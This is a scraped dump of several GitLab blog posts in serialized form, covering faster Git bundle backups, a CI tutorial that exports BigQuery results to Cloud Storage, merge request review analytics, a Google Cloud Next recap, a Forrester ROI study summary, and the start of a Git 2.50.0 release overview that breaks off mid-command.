mapping\n\nTo resolve this performance issue, we contributed an upstream fix to Git that replaces the nested loops with a map data structure. Each reference is added to the map, which automatically ensures only a single copy of each reference is retained for processing.\n\nThis change dramatically enhances the performance of `git bundle create` and enables much better scalability in repositories with large reference counts. Benchmark testing on a repository with 10,000 references demonstrates a 6x performance improvement.\n\n```shell\nBenchmark 1: bundle (refcount = 100000, revision = master)\n  Time (mean ± σ): \t14.653 s ±  0.203 s\t[User: 13.940 s, System: 0.762 s]\n  Range (min … max):   14.237 s … 14.920 s\t10 runs\n\nBenchmark 2: bundle (refcount = 100000, revision = HEAD)\n  Time (mean ± σ):  \t2.394 s ±  0.023 s\t[User: 1.684 s, System: 0.798 s]\n  Range (min … max):\t2.364 s …  2.425 s\t10 runs\n\nSummary\n  bundle (refcount = 100000, revision = HEAD) ran\n\t6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)\n```\n\nThe patch was accepted and [merged](https://gitlab.com/gitlab-org/git/-/commit/bb74c0abbc31da35be52999569ea481ebd149d1d) into upstream Git. At GitLab, we backported this fix to ensure our customers could benefit immediately, without waiting for the next Git release.\n\n## The result: Dramatically decreased backup times\n\nThe performance gains from this improvement have been nothing short of transformative:\n\n* **From 48 hours to 41 minutes:** Creating a backup of our largest repository (`gitlab-org/gitlab`) now takes just 1.4% of the original time.\n* **Consistent performance:** The improvement scales reliably across repository sizes.\n* **Resource efficiency:** We significantly reduced server load during backup operations.\n* **Broader applicability:** While backup creation sees the most dramatic improvement, all bundle-based operations that operate on many references benefit.\n\n## What this means for GitLab customers\n\nFor GitLab customers, this enhancement delivers immediate and tangible benefits on how organizations approach repository backup and disaster recovery planning:\n* **Transformed backup strategies**   \n  * Enterprise teams can establish comprehensive nightly schedules without impacting development workflows or requiring extensive backup windows.   \n  * Backups can now run seamlessly in the background during nightly schedules, instead of needing to be dedicated and lengthy.  \n* **Enhanced business continuity**  \n  * With backup times reduced from days to minutes, organizations significantly minimize their recovery point objectives (RPO). This translates to reduced business risk – in a disaster scenario, you're potentially recovering hours of work instead of days.  \n* **Reduced operational overhead**   \n  * Less server resource consumption and shorter maintenance windows.  \n  * Shorter backup windows mean reduced compute costs, especially in cloud environments, where extended processing time translates directly to higher bills.  \n* **Future-proofed infrastructure**   \n  * Growing repositories no longer force difficult choices between backup frequency and system performance.   \n  * As your codebase expands, your backup strategy can scale seamlessly alongside it\n\nOrganizations can now implement more robust backup strategies without compromising on performance or completeness. What was once a challenging trade-off has become a straightforward operational practice.\n\nStarting with the [GitLab 18.0](https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/) release, all GitLab customers regardless of their license tier can already fully take advantage of these improvements for their [backup](https://docs.gitlab.com/administration/backup_restore/backup_gitlab/) strategy and execution. There is no further change in configuration required.\n\n## What's next\n\nThis breakthrough is part of our ongoing commitment to scalable, enterprise-grade Git infrastructure. While the improvement of 48 hours to 41 minutes for backup creation time represents a significant milestone, we continue to identify and address performance bottlenecks throughout our stack.\n\nWe're particularly proud that this enhancement was contributed upstream to the Git project, benefiting not just GitLab users but the broader Git community. This collaborative approach to development ensures that improvements are thoroughly reviewed, widely tested, and available to all.\n\n> Deep infrastructure work like this is how we approach performance at GitLab. Join the GitLab 18 virtual launch event to see what other fundamental improvements we're shipping. [Register today!](https://about.gitlab.com/eighteen/)",[983,900,757,966,475],"git",{"slug":985,"featured":91,"template":789},"how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes",{"content":987,"config":994},{"title":988,"description":989,"authors":990,"heroImage":895,"date":991,"body":992,"category":725,"tags":993},"Tutorial: Secure BigQuery data publishing with GitLab ","Learn how to create repeatable, auditable, and efficient processes for automating and securing BigQuery data exports.",[844],"2025-03-25","GitLab offers a powerful solution for automating and securing [BigQuery](https://cloud.google.com/bigquery) data exports. This integration transforms manual exports into repeatable, auditable processes that can eliminate security vulnerabilities while saving valuable time. This tutorial explains how to implement this solution so you can quickly reduce manual operations, permission issues, and security concerns with just a few lines of GitLab YAML code.\n\nFollow along with this step-by-step video:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/gxXX-ItAreo?si=FijY9wMVppCW-18q\" frameborder=\"0\" allowfullscreen=\"true\">\u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## The solution architecture\n\nOur solution leverages GitLab CI/CD pipelines to automate the secure export of data from BigQuery to Google Cloud Storage. Here's the high-level architecture:\n\n1. SQL code is stored and version-controlled in GitLab.  \n2. After code review and approval, GitLab CI/CD pipeline executes the code.  \n3. The pipeline authenticates with Google Cloud.  \n4. SQL queries are executed against BigQuery.  \n5. Results are exported as CSV files to Google Cloud Storage.  \n6. Secure links to these files are provided for authorized consumption.\n\n## Prerequisites\n\nBefore we begin, ensure you have:\n\n* **Google Cloud APIs enabled:** BigQuery API and Cloud Storage API  \n* **Service account** with appropriate permissions:  \n  * BigQuery Job User  \n  * Storage Admin  \n  * **Note:** For this demo, we're using the service account approach for authentication, which is simpler to set up. For production environments, you might consider using GitLab's identity and access management integration with Google Cloud. This integration leverages Workload Identity Federation, which provides enhanced security and is more suitable for enterprise customers and organizations.  \n* **GitLab project** ready to store your SQL code and pipeline configuration\n\n## Step-by-step implementation\n\n**1. Configure Google Cloud credentials.**\n\nFirst, set up the necessary environment variables in your GitLab project:\n\n- Go to your **GitLab project > Settings > CI/CD**.  \n- Expand the **Variables** section.  \n- Add the following variables:  \n   * `GCS_BUCKET`: Your Google Cloud Storage bucket name  \n   * `GCP_PROJECT_ID`: Your Google Cloud project ID  \n   * `GCP_SA_KEY`: Base64-encoded service account key (mark as masked)\n\n**2. Create your SQL query.**\n\nCreate a file named `query.sql` in your GitLab repository with your BigQuery SQL query. The query looks like this:\n\n```\n-- This query shows a list of the daily top Google Search terms.\nSELECT\n   refresh_date AS Day,\n   term AS Top_Term,\n       -- These search terms are in the top 25 in the US each day.\n   rank,\nFROM `bigquery-public-data.google_trends.top_terms`\nWHERE\n   rank = 1\n       -- Choose only the top term each day.\n   AND refresh_date >= DATE_SUB(CURRENT_DATE(), INTERVAL 2 WEEK)\n       -- Filter to the last 2 weeks.\nGROUP BY Day, Top_Term, rank\nORDER BY Day DESC\n   -- Show the days in reverse chronological order.\n\n```\n\nThis query gets the top 25 search terms from Google Trends for the current day.\n\n**3. Configure the GitLab CI/CD pipeline.**\n\nCreate a `.gitlab-ci.yml` file in your repository root:\n\n```\nimage: google/cloud-sdk:alpine\n\ninclude:\n  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml\n\nexecute:\n  stage: deploy\n  script: \n    # Set up Google Cloud authentication and install necessary components\n    - export GOOGLE_CLOUD_CREDENTIALS=$(echo $SERVICE_ACCOUNT_KEY | base64 -d)\n    - echo $GOOGLE_CLOUD_CREDENTIALS > service-account-key.json \n    - gcloud auth activate-service-account --key-file service-account-key.json \n    - gcloud components install gsutil\n    # Set the active Google Cloud project\n    - gcloud config set project $PROJECT_ID\n    # Run the BigQuery query and export the results to a CSV file\n    - bq query --format=csv --use_legacy_sql=false \u003C test.sql > results.csv\n    # Create a Google Cloud Storage bucket if it doesn't exist\n    - gsutil ls gs://${CLOUD_STORAGE_BUCKET} || gsutil mb gs://${CLOUD_STORAGE_BUCKET}\n    # Upload the CSV file to the storage bucket\n    - gsutil cp results.csv gs://${CLOUD_STORAGE_BUCKET}/results.csv\n    # Set the access control list (ACL) to make the CSV file publicly readable\n    - gsutil acl ch -u AllUsers:R gs://${CLOUD_STORAGE_BUCKET}/results.csv\n    # Define the static URL for the CSV file\n    - export STATIC_URL=\"https://storage.googleapis.com/${CLOUD_STORAGE_BUCKET}/results.csv\"\n    # Display the static URL for the CSV file\n    - echo \"File URL = $STATIC_URL\"\n\n```\n\n**4. Run the pipeline.**\n\nNow, whenever changes are merged to your main branch, the pipeline will provide a link to the CSV file stored on the Google Cloud Storage bucket. This file contains the result of the executed SQL query that GitLab subjects to security checks.\n\n## Benefits of this approach\n\n* **Security:** Authentication is handled automatically via service accounts (or Workload Identity Federation for enhanced security in production environments).  \n* **Auditability:** All data exports are tracked through GitLab commits and pipeline logs.  \n* **Repeatability:** Consistent, predictable export process on every run, and can be scheduled.  \n* **Version control:** SQL queries are properly versioned and reviewed.  \n* **Automation:** Significantly fewer manual exports, reducing human error.\n\n## Try it today\n\nBy combining GitLab's DevSecOps capabilities with Google Cloud's BigQuery and Cloud Storage, you've now automated and secured your data publishing workflow. This approach reduces manual operations, resolves permission headaches, and addresses security concerns – all achieved with just a few lines of GitLab CI code.\n\n> Use this tutorial's [complete code example](https://gitlab.com/gitlab-partners-public/google-cloud/demos/big-query-data-publishing) to get started now.",[709,475,786,799,231,848],{"slug":995,"featured":91,"template":789},"tutorial-secure-bigquery-data-publishing-with-gitlab",{"content":997,"config":1007},{"title":998,"description":999,"authors":1000,"heroImage":1002,"date":1003,"body":1004,"category":725,"tags":1005},"How we reduced MR review time with Value Stream Management ","The GitLab engineering team leverages VSM to pinpoint bottlenecks in the merge request review process and streamline software delivery. See how we do it and what we've learned.",[1001],"Haim Snir","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097876/Blog/Hero%20Images/Blog/Hero%20Images/REFERENCE%20-%20display%20preview%20for%20blog%20images%20%282%29_2pKf8RsKzAaThmQfqHIaa7_1750097875817.png","2025-02-20","At GitLab, we're passionate about using our own products internally, a.k.a. dogfooding. Dogfooding has led to significant improvements in accelerating our software delivery cycle time for customers. This article spotlights a specific use case where [GitLab Value Stream Management (VSM)](https://about.gitlab.com/solutions/value-stream-management/) has driven significant improvements for our engineering team. You'll learn how VSM helped us tackle two critical challenges: measuring the journey from idea conception to merge request completion, and streamlining our deployment workflows.\n\n## The Challenge: Identifying bottlenecks in MR reviews\n\nDespite having well-defined workflows, one team noticed that MRs were taking longer than expected to be reviewed and merged. The challenge wasn’t just about the delays themselves, but about understanding *where* in the review process these delays were happening and *why*.\n\nOur team’s goal was clear:\n\n- Identify where time was being spent from the initial idea to the final merge of an MR.  \n- Pinpoint specific bottlenecks in the review process.  \n- Understand how MR size, complexity, or documentation quality affect review time.\n\n## The Approach: Measures the MR review time in GitLab Value Stream Analytics\n\nValue Stream Analytics (VSA) enables organizations to map their entire workflow from idea to delivery, distinguishing between value-adding activities (VA) and non-value-adding activities (NVA) in the process flow. By calculating the ratio of value-added time to total lead time, the team can identify wasteful activities resulting in delays in MR reviews.\n\nTo obtain the necessary metrics, the team customized GitLab VSA to gain better visibility into our MR review process.\n\n### 1. Setting up a custom stage for MR review\n\nThe team added a [new custom stage](https://docs.gitlab.com/ee/user/group/value_stream_analytics/#value-stream-stage-events) in VSA called **Review Time to Merge** to specifically track the time from when a reviewer was first assigned to when the MR was merged.\n\n* Start event: MR first reviewer assigned  \n* End event: MR merged\n\nBy defining this stage, VSA began measuring the duration of the MR review process, giving us precise data on where time was being spent.\n\n![Defining stage of VSA](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097884/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097883929.png)\n\n### 2. Using the Total Time Chart for clarity\n\nWith the custom stage in place, the team used the [**Total Time Chart** on the VSA Overview page](https://about.gitlab.com/blog/value-stream-total-time-chart/) (**Analyze > Value Stream**) to visualize how much time was spent during the new MR Review stage. By comparing the values represented by each area on the chart, the team could quickly identify how this stage contributed to the total software delivery lifecycle (SDLC) time.\n\n![total time chart for VSA](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097884/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097883930.png)\n\n### 3. Drilling down for deeper insights\n\nTo investigate specific delays, the team used the **Stage Navigation Bar** to dive deeper into the MR Review stage. This view allowed them to:\n\n- Sort MRs by review time: The stage table showed all related MRs, sorted by review duration, making it easy to detect slow MRs.  \n- Analyze individual MRs: For each MR, that team could examine factors such as reviewer assignment delays, multiple rounds of feedback, idle time after approval, and MR size/complexity.\n\n## The outcome: Actionable insights and improvements\n\nBy customizing VSA to track [MR review time](https://docs.gitlab.com/user/project/merge_requests/reviews/), the team uncovered several key insights:\n\n- **Delays in reviewer assignment:** Some MRs experienced delays because reviewers were assigned late, or reviewers had too many MRs in their queue.  \n- **Slow review start times:** Even after assignment, certain MRs sat idle before reviews began, often due to context switching or competing priorities.  \n- **Multiple feedback loops:** Larger MRs often required multiple rounds of feedback, which extended review time significantly.  \n- **Idle time post-approval:** Some MRs were approved but not merged promptly, often due to deployment coordination issues.\n\nFor the engineering manager on the team, VSA proved to be transformational/valuable in managing their team's workflow: *\"I've used the VSA to justify where we were spending time in MR completion. We have VSA customized to our needs, and it's been very beneficial to our investigations for opportunities for improvements.”* \n\nAlso, from this dogfooding experience, we’re now developing a key enhancement to improve visibility into the review process. We're adding a new event to VSA — [Merge request last approved at](https://gitlab.com/gitlab-org/gitlab/-/issues/503754) — which creates a stage that breaks down MR review steps even further for granular visibility.\n\n## The power of data-driven decisions\n\nBy leveraging GitLab’s VSA, we didn’t just identify bottlenecks – we gained actionable insights that led to measurable improvements in MR review time and overall developer productivity. We optimized merge request review cycles and increased developer throughput, validating our commitment to continuous improvement through measurement.\n\n> Want to learn more about how VSA can help your team? [Start a free, 60-day trial of GitLab Ultimate](https://about.gitlab.com/free-trial/), customize your value streams, and see how you can make improvements throughout the SDLC for your teams. Then, make sure to [share your feedback and experiences in this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/520962).\n\n## Read more\n\n- [Optimize value stream efficiency to do more with less, faster](https://about.gitlab.com/the-source/platform/optimize-value-stream-efficiency-to-do-more-with-less-faster/)\n- [New Scheduled Reports Generation tool simplifies value stream management](https://about.gitlab.com/blog/new-scheduled-reports-generation-tool-simplifies-value-stream-management/)\n- [Value stream analytics documentation](https://docs.gitlab.com/user/group/value_stream_analytics/)\n- [Value stream management: Total Time Chart simplifies top-down optimization flow](https://about.gitlab.com/blog/value-stream-total-time-chart/)\n",[757,785,475,799,1006],"solutions architecture",{"slug":1008,"featured":6,"template":789},"how-we-reduced-mr-review-time-with-value-stream-management",{"category":732,"slug":736,"posts":1010},[1011,1022,1035],{"content":1012,"config":1020},{"title":1013,"description":1014,"authors":1015,"heroImage":1016,"date":1017,"body":1018,"category":736,"tags":1019},"GitLab at Next '25: Transforming app modernization","GitLab participated in Google Cloud Next ‘25 and received a fifth consecutive Google Cloud Technology Partner of the Year recognition.",[844],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663121/Blog/Hero%20Images/LogoLockupPlusLight.png","2025-04-11","GitLab's presence at Google Cloud Next '25 highlighted our strong partnership with Google Cloud and our joint commitment to accelerating software development and delivery. We were recognized again as a Technology Partner of the Year, and included in key enterprise initiatives like Google Distributed Cloud (GDC) Build Partners and [Startup Perks from Google Cloud](https://cloud.google.com/blog/topics/startups/why-global-startups-are-gathering-at-google-cloud-next25?e=13802955). Our team members demonstrated for attendees how GitLab is positioned to be a critical DevSecOps service for Google Cloud customers.\n\n## Continuing our award-winning partnership excellence\n\n\u003Cimg src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752175937/Blog/nempa4yvfutedz3fpuxx.jpg\" alt=\"GitLab team at Google Cloud Next '25\" align=\"left\" width=\"400px\" style=\"padding-right: 20px; padding-bottom: 10px\"/>\n\nWe're thrilled to announce that GitLab has once again been named a [Google Cloud Technology Partner of the Year award winner](https://about.gitlab.com/press/releases/2025-04-08-gitlab-wins-a-google-cloud-technology-partner-of-the-year-award-for-devops/), marking our fifth consecutive time receiving this prestigious honor. This remarkable achievement reaffirms our position as Google Cloud's primary DevOps partner, consistently delivering exceptional value year after year. The continued recognition highlights how our collaboration with Google Cloud creates tangible business outcomes for customers, enabling organizations across industries to build, secure, and deploy applications with efficiency and confidence.\n\n## Google Distributed Cloud: DevSecOps for highly regulated environments\n\nAnother significant milestone announced at Next '25 was GitLab's \"Google Cloud Ready - Distributed Cloud\" certification. This designation enables organizations to implement GitLab in air-gapped environments, addressing critical security and compliance requirements.\n\nAs an end-to-end DevSecOps solution available on Google Distributed Cloud, GitLab enables sovereign development and operations for workloads critical to national security and regulatory compliance. This integration is particularly valuable for government agencies and financial institutions that require the highest levels of data sovereignty while maintaining modern development practices.\n\n## GitLab perks for Google Startups\n\nGitLab is a Featured Partner of the new Startup Perks program from Google Cloud. This partnership ties up with our own [GitLab for Startups](https://about.gitlab.com/solutions/startups/google-cloud/) and is meant to jumpstart new tech ventures with key DevSecOps capabilities that can help with fast growth and scaling.\n\nAs one of the [Featured Perks partners](https://cloud.google.com/startup/perks), eligible startups can get free or discounted access to one year of [GitLab Ultimate](https://about.gitlab.com/pricing/ultimate/) for 20 licenses. For seed or early stage startups, this benefit can help ensure collaboration, efficiency, and security without sacrificing speed and agility.\n\n## Thoughts from the dais\n\nGitLab experts shared valuable insights across multiple speaking sessions at Next '25, delivering practical knowledge on AI-powered DevSecOps, platform engineering, and cloud application delivery:\n\n* __[AI DevOps panel](https://cloud.withgoogle.com/next/25/session-library?session=BRK2-163&utm_source=copylink&utm_medium=unpaidsoc&utm_campaign=FY25-Q2-global-EXP106-physicalevent-er-next25-mc&utm_content=reg-is-live-next-homepage-social-share&utm_term=-):__ Mike Flouton, GitLab Vice President of Product Management, joined industry leaders to discuss how AI code assist tools boost productivity while enhancing application performance.\n\n* __[Software Logistics - The Missing Link in Modern Platform Engineering](https://cloud.withgoogle.com/next/25/session-library?session=CT2-16&utm_source=copylink&utm_medium=unpaidsoc&utm_campaign=FY25-Q2-global-EXP106-physicalevent-er-next25-mc&utm_content=reg-is-live-next-homepage-social-share&utm_term=-):__ GitLab Field CTO Lee Faus explored how effective software logistics create the foundation for successful platform engineering initiatives.\n\n* __[Revolutionizing Cloud Application Delivery with Intelligent Agents](https://cloud.withgoogle.com/next/25/session-library?session=CT2-17&utm_source=copylink&utm_medium=unpaidsoc&utm_campaign=FY25-Q2-global-EXP106-physicalevent-er-next25-mc&utm_content=reg-is-live-next-homepage-social-share&utm_term=-):__ Faus also demonstrated how intelligent agents are transforming cloud application delivery pipelines.\n\n## Engaging attendees across Next '25\n\nIn addition to our speaking sessions, GitLab maintained a strong presence throughout Next '25. At our booth #2170 on the expo floor, our team engaged with hundreds of attendees through demonstrations and lightning talks featuring both GitLab experts and partners like Arctiq and SADA.\n\nThe Google Cloud Makerspace's Dev Tools Pantry became a hub of innovation and collaboration. John Coghlan, Director of Developer Advocacy, observed: \"It was great to connect with many GitLab and Google Cloud customers in the Dev Tools Pantry in the Makerspace. We loved seeing the creative solutions that people came up with around developer experience and simplified deployments using GitLab and Google Cloud as their ingredients.\"\n\nThese hands-on experiences showcased how GitLab's DevSecOps solutions integrate well with Google Cloud services, with our AI-powered capabilities demonstrations drawing particular interest from attendees looking to enhance developer productivity and application security.\n\n## GitLab and Google Cloud: Transforming the future together\n\nThe energy witnessed at Next '25 exemplifies why GitLab and Google Cloud make such powerful partners. Together, we help organizations to transform how they build, secure, and deploy applications through:\n\n* AI-assisted development capabilities and collaborative workflows that can help accelerate innovation in Google Cloud environments\n\n* Shift-left security approach that integrates with Google Cloud's security-first architecture to identify vulnerabilities early in the development lifecycle\n\n* Flexible deployment options and comprehensive observability that work harmoniously with Google Cloud infrastructure to help streamline operations\n\nAs demonstrated at Next '25, the GitLab and Google Cloud partnership delivers tangible advantages for development teams facing real-world challenges – whether accelerating AI adoption, strengthening security in regulated environments, or streamlining complex deployment pipelines. The technical integration points and customer success stories shared throughout the event underscore that this collaboration continues to produce practical solutions that matter.\n\n> #### Discover how GitLab and Google Cloud can transform your application development experience at [GitLab's Google Cloud partnership page](https://about.gitlab.com/partners/technology-partners/google-cloud-platform/).",[848,475,277,282,736],{"slug":1021,"featured":6,"template":789},"gitlab-at-next-25-transforming-app-modernization",{"content":1023,"config":1033},{"title":1024,"description":1025,"authors":1026,"heroImage":1028,"date":1029,"body":1030,"category":736,"tags":1031},"GitLab Ultimate's total economic impact: 483% ROI over 3 years","A Forrester Consulting study of GitLab Ultimate finds that the DevSecOps platform enhanced security posture with 5x time saved on security-related activities.\n",[1027],"Dave Steer","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750098354/Blog/Hero%20Images/Blog/Hero%20Images/blog-image-template-1800x945%20%281%29_5XrohmuWBNuqL89BxVUzWm_1750098354056.png","2024-11-13","A powerful DevSecOps platform streamlines operations, prevents security vulnerabilities from disrupting (and costing) your business, increases productivity, and fosters a culture of innovation and collaboration. That's exactly what we built GitLab to do, and our Ultimate tier represents the full power of our platform. To see the real-world results, we commissioned Forrester Consulting to create a “Total Economic Impact™ of GitLab Ultimate” study. Here’s what we discovered at a glance. \n\nAccording to the study, for a composite organization based on interviewed customers, GitLab delivered:  \n\n* **Three-year ROI of 483%**  \n* **400% improvement in developer productivity**  \n* **15x faster time to first release\u003Csup>1\u003C/sup>**  \n* **5x time saved on security-related activities**\n\n**Overall, GitLab enables 50% more work with business value.** \n\nThe numbers tell a clear story: GitLab's platform transforms how teams work together. Whether you’re an application security lead tasked with improving the company’s security posture, a developer looking to deliver high-quality code faster, or a CTO looking for a scalable, secure, and flexible DevSecOps platform, this study (see full methodology below) shows that GitLab Ultimate delivers. Let’s break down the results.  \n\n> Download the full [2024 Forrester Consulting “Total Economic Impact of GitLab Ultimate” study](https://about.gitlab.com/resources/study-forrester-tei-gitlab-ultimate/).\n\n## **1\\. Three-year ROI of 483%**\n\n*“The big win for us was efficiency — both in administration and in overall operations. Now, everyone can work collaboratively, and we can easily automate our pipeline. I’m also able to move personnel around to complete different tasks more efficiently. Rather than needing to train on different tools across programs, now it’s just ‘learn GitLab,’ and they’re ready to begin working.”* - CTO and Senior Vice President, Defense industry\n\nThe study found that teams started seeing payback within six months of implementing GitLab Ultimate, primarily through improved efficiency. With a **483% ROI over three years**, organizations reduced their software toolchain costs by 25% and cut the time IT teams spent on administering complex toolchains by 75%. Beyond the cost savings, moving to a unified platform fundamentally improves how teams develop and deliver software.\n\n## **2\\. 400% improvement in productivity**\n\n*“When I have conversations about GitLab with our developers, they universally agree that it has increased productivity at our organization across teams and roles. We now have one platform that has functions that everyone can use.”* - Software architect, Energy/Research industry\n\nDevelopers thrive in environments where they can easily switch between tasks without losing momentum. According to the study, developers can reclaim up to 305 hours per year by using [testing automation](https://about.gitlab.com/topics/devops/devops-test-automation/) within GitLab to help them test more frequently and track and fix bugs faster, all within a single interface with no context switching. This streamlined workflow allows them to focus on coding rather than juggling multiple tools and processes.\n\nThe productivity gains extend to onboarding, too: new hires in the composite organization’s software development team ramped up to full productivity 75% faster (i.e., in 1.5 weeks instead of 1.5 months). The impact is clear: Everyone on the team can contribute meaningful work sooner. \n\n## **3\\. 15x faster time to first release**\n\n*“Our superpower is software. It’s measured in terms of velocity and the ability to get new capabilities into the hands of our customers. For that to remain our primary focus, it just made economic sense to \\[consolidate\\] onto a single platform.”* - CTO and Senior Vice President, Defense industry\n\nThe summary data from the customer interviews reveals that GitLab enables organizations to accelerate first production release by 15 times. This boost is achieved through faster project initiation, more frequent software releases, and a proactive approach to security that natively integrates security scans into the development process from the outset. Even with this increase in velocity, software quality, and security remain at the same high levels, thanks to developers' ability to fix issues early and quickly. \n\nWith [security built directly into the development process](https://about.gitlab.com/solutions/security-compliance/), developers can identify, prioritize, and remediate vulnerabilities without disrupting their flow. This unified approach to managing the entire software development lifecycle means teams can move faster without compromising on security.\n\n## **4\\. 5x time saved on security-related activities**\n\n*“Integrating security and quality scanners into the pipeline was a game changer for us. With more automation and less manual work, we’re seeing fewer failures, fewer problems, and faster progress.”* - Program Manager, Finance industry \n\nSecurity is top-of-mind for every organization, as development speeds up and threats keep evolving. GitLab saves security team members in the composite organization **78 hours per member per year** by automating recurring tasks like disaster recovery prep, auditing, and compliance checks. GitLab also improves visibility into software development processes, helping security and development teams work together more efficiently.  \n\nCybersecurity and software development teams at the composite organization **managed and mitigated security risks throughout the software development lifecycle with 81% less effort.** This is because GitLab enabled them to integrate security protocols and scans throughout all stages of the software development lifecycle, simplifying how they maintain stringent security standards. As security testing and remediation are built into pipelines, teams reduce average response times and the risk of issues reaching production. \n\n# **Experience DevSecOps in action**\n\nWith a 483% ROI, a rapid payback period, and countless success stories, GitLab is an invaluable tool for enterprises looking to transform their software development processes.\n\n> To explore how GitLab can benefit your organization, download the full [Forrester Consulting “Total Economic Impact of GitLab Ultimate” study today](https://about.gitlab.com/resources/study-forrester-tei-gitlab-ultimate/).\n\n**Methodology**  \n*For the study, Forrester interviewed four GitLab Ultimate customers across industries, including finance, defense, and research, and created a composite organization to represent the aggregated results of these interviews. The composite organization is expected to adopt GitLab Ultimate across all teams in a three-year period.*\n\n*The composite organization is a $5 billion company with 5,000 employees, with 40% involved in software delivery and 50% of annual revenue driven by software development. Their goals are to consolidate multiple tools into a single, integrated platform, enhance developer productivity, ensure compliance with industry regulations and internal policies, and strengthen security throughout the development lifecycle.*\n\n*1. Based on summary data from customer interviews; not applicable to the composite organization results.*",[475,1032,736,767],"research",{"slug":1034,"featured":91,"template":789},"gitlab-ultimates-total-economic-impact-483-roi-over-3-years",{"content":1036,"config":1045},{"title":1037,"description":1038,"authors":1039,"heroImage":1041,"date":1042,"body":1043,"category":736,"tags":1044},"Introducing The Source: Insights for the future of software development","Explore our new publication for transformative software development strategies and expert advice on emerging technologies.",[1040],"Chandler Gibbons","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749674616/Blog/Hero%20Images/blog-image-template-1800x945__1_.png","2024-10-29","Modern software development is transforming the way organizations create, deliver, and scale business value. Teams must be able to build solutions quickly and efficiently while navigating rising security threats, emerging technologies, and increasingly complex compliance demands.\n\nToday, GitLab is launching [The Source](https://about.gitlab.com/the-source/), a new publication that covers the evolution of software development as an engine for business success. We offer regular insights into the future of software development, supported by original research and analysis from our subject matter experts and thought leaders.\n\nOn The Source, you will find answers to questions such as:  \n* How can leaders measure the ROI of AI across the software development lifecycle?  \n* What’s the best way to ensure security and compliance across the entire software supply chain?\n* What types of efficiencies will teams see from platform and toolchain consolidation?\n\nHere’s a sample of what's on The Source today:\n\n**4 steps for measuring the impact of AI**\n\n\"Evaluating the productivity of AI-enhanced coding requires a more nuanced approach than traditional metrics such as lines of code, code commits, or task completion. It necessitates shifting the focus to real-world business outcomes that balance development speed, software quality, and security.\"  \n- [Learn the 4 steps from AI expert Taylor McCaslin.](https://about.gitlab.com/the-source/ai/4-steps-for-measuring-the-impact-of-ai/)\n\n**Addressing the root cause of common security frustrations**\n\n\"DevSecOps promises better integration between engineering and security, but it’s clear that frustrations and misalignment persist. That’s because these challenges are symptoms of a larger problem with how organizations view security, as well as how teams work together and how they allocate time to security.\"  \n- [Solve this disconnect with expert advice from GitLab CISO Josh Lemos.](https://about.gitlab.com/the-source/security/security-its-more-than-culture-addressing-the-root-cause-of-common-security/)\n\n**Driving business results with platform engineering**\n\n\"Platform engineering aims to normalize and standardize developer workflows by providing developers with optimized 'golden paths' for most of their workloads and flexibility to define exceptions for the rest.\"  \n- [Discover GitLab Field CTO Brian Wald's best practices for platform engineering success.](https://about.gitlab.com/the-source/platform-and-infrastructure/driving-business-results-with-platform-engineering/)\n\n## Make The Source your decision-making partner\n\nVisit [The Source](https://about.gitlab.com/the-source/) today to explore the latest insights, get answers to your leadership questions, and learn something new to share with your teams. You can also subscribe to our newsletter for regular updates directly to your inbox. Join our community of forward-thinking technology leaders and help shape the future of software development.",[675,767,736,709],{"slug":1046,"featured":91,"template":789},"introducing-the-source-insights-for-the-future-of-software-development",{"category":743,"slug":747,"posts":1048},[1049,1061,1073],{"content":1050,"config":1059},{"title":1051,"description":1052,"authors":1053,"heroImage":1055,"body":1056,"date":1057,"category":747,"tags":1058},"What’s new in Git 2.50.0?","Here are contributions from GitLab's Git team and the Git community such as the git-diff-pairs(1) command and git-update-ref(1) option to perform batched reference updates.",[1054],"Justin Tobler","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663087/Blog/Hero%20Images/git3-cover.png","The Git project recently released [Git Version 2.50.0](https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/T/#u). Let's look at a few notable highlights from this release, which includes contributions from the Git team at GitLab and also the wider Git community.\n## New git-diff-pairs(1) command\n\nDiffs are at the heart of every code review and show all the changes made\nbetween two revisions. GitLab shows diffs in various places, but the most\ncommon place is a merge request's [\"Changes\" tab](https://docs.gitlab.com/user/project/merge_requests/changes/).\nBehind the scenes, diff generation is powered by\n[`git-diff(1)`](https://git-scm.com/docs/git-diff). For example:\n\n```shell\n$ git diff HEAD~1 HEAD\n```\n\nThis command returns the full diff for all changed files. This might pose a scalability challenge because the number of files changed between a set of revisions could be very large and cause the command to reach self-imposed timeouts for the GitLab backend. For large change sets, it would be better if\nthere were a way to break diff computation into smaller, more digestible chunks.\n\nOne way this can be achieved is by using\n[`git-diff-tree(1)`](https://git-scm.com/docs/git-diff-tree) to retrieve info\nabout all the changed files:\n\n```shell\n$ git diff-tree -r -M --abbrev HEAD~ HEAD\n:100644 100644 c9adfed339 99acf81487 M      Documentation/RelNotes/2.50.0.adoc\n:100755 100755 1047b8d11d 208e91a17f M      GIT-VERSION-GEN\n```\n\nGit refers to this output as the [\"raw\" format](https://git-scm.com/docs/git-diff-tree#_raw_output_format).\nIn short, each line of output lists filepairs and the accompanying metadata\nabout what has changed between the start and end revisions. Compared to\ngenerating the \"patch\" output for large changes, this process is relatively\nquick and provides a summary of everything that changed. This command can optionally perform rename detection by  appending the `-M` flag to check if identified changes were due to a file rename.\n\nWith this information, we could use `git-diff(1)` to compute each of the\nfilepair diffs individually. For example, we can provide the blob IDs\ndirectly:\n\n```shell\n$ git diff 